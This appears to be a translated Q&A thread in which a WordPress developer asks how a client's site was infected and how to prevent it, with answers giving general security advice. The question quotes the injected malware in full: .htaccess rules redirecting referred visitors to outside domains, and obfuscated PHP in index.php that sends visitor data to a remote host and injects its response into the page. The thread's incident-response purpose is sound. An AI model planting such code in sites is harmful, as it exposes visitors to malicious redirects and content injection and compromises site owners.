1. 首頁
  2. 問答
  3. 防止我的網站上的惡意軟件攻擊

防止我的網站上的惡意軟件攻擊

2013-05-16 92 views
-1

我爲客戶建立了一個wordpress網站。過了一段時間,客戶報告該網站已被谷歌收集惡意軟件內容。當我瀏覽網站時,我發現代碼中有一些變化,例如.htaccess的代碼與上一代代碼不同。 防止我的網站上的惡意軟件攻擊

RewriteEngine On 

RewriteBase/

RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+) 

RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC] 

RewriteRule ^.*$ http://clubatleticoestrada.org.ar/awas.html?h=1110720 [L,R] 

</IfModule> 



<IfModule mod_rewrite.c> 
RewriteEngine On 
RewriteBase/
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+) 
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC] 
RewriteRule ^.*$ http://halisahamiz.com/eehs.html?h=1110720 [L,R] 
</IfModule> 


<IfModule mod_rewrite.c> 
RewriteEngine On 
RewriteBase/
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+) 
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC] 
RewriteRule ^.*$ http://zabetonom.ru/mhos.html [L,R] 
</IfModule> 


RewriteEngine On 

RewriteBase/



# MCCL 



# END MCCL

,並在index.php contanied這樣的:

if (!isset($sRetry)) 
{ 
global $sRetry; 
$sRetry = 1; 
    // This code use for global bot statistic 
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot 
    $stCurlHandle = NULL; 
    $stCurlLink = ""; 
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes 
    { 
     if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics    
     $stCurlLink = base64_decode('aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); 
      @$stCurlHandle = curl_init($stCurlLink); 
    } 
    } 
if ($stCurlHandle !== NULL) 
{ 
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); 
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6); 
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
    {$sResult[0]=" "; 
     echo $sResult; // Statistic code end 
     } 
    curl_close($stCurlHandle); 
} 
}

這是如何攻擊發生,我怎麼能防止自己在這次襲擊的未來?

在重置網站時,我發現一些文件在公共Html文件夾外受到影響。現在人們怎麼管理它?

來源

2013-05-16 Codeeater

+3

我認爲這[論壇](http://security.stackexchange.com/)會更合適:) –

+0

有這麼多的方式可能發生。 PM我的網址,我會看看我是否可以找到任何明顯的安全問題,並指出你在正確的方向。或者如果你不舒服的話。上面的評論也是對的。 – user1596138

+0

@AdrienLacroix好吧..我一定會嘗試其他論壇。謝謝。 – Codeeater

回答

2

整個大型圖書館不足以解釋如何執行「黑客攻擊」。攻擊網站有很多方法和工具。除了SQL injection,cross scripts以及密碼竊取等非常常見的問題,還有專業人士使用的複雜工具。 如果我瞭解發生了什麼,他們已將您的網站重定向。 我只能建議您確保您的服務器上有最新的軟件更新,請使用「檢查工具」(如thisAcunetix)檢查您的網站。黑客也在尋找易受攻擊的網站。 如果您認爲重新加載備份可以解決問題,您可能會遇到意外。黑客使用下載後門,他們回到您的網站。所以更改密碼可能不起作用。我建議你在清理時要非常小心。同時詢問您的提供商是否有任何其他網站在同一臺服務器上遭到黑客入侵。在這種情況下,您可以確定服務器上有後門(shell)。在這種情況下,您的問題不是您的問題,而是供應商負責清理漏洞並清理服務器。這是最常見的情況。 以上所有內容僅僅是對問題的複雜性給出了一個粗略的概念,我完全同意Adrien這個主題是針對互聯網安全論壇的。

來源

2013-05-16 16:42:08 FeliceM

+0

但是,如何在同一臺服務器上託管的每個站點同時受到攻擊?這是編程方面還是託管公司的安全漏洞? – Codeeater

+0

如果服務器存在漏洞,您可以對其中一個站點進行破解,然後可以對其進行修復並控制整個服務器的內容。 – FeliceM

相關問題

 相關問題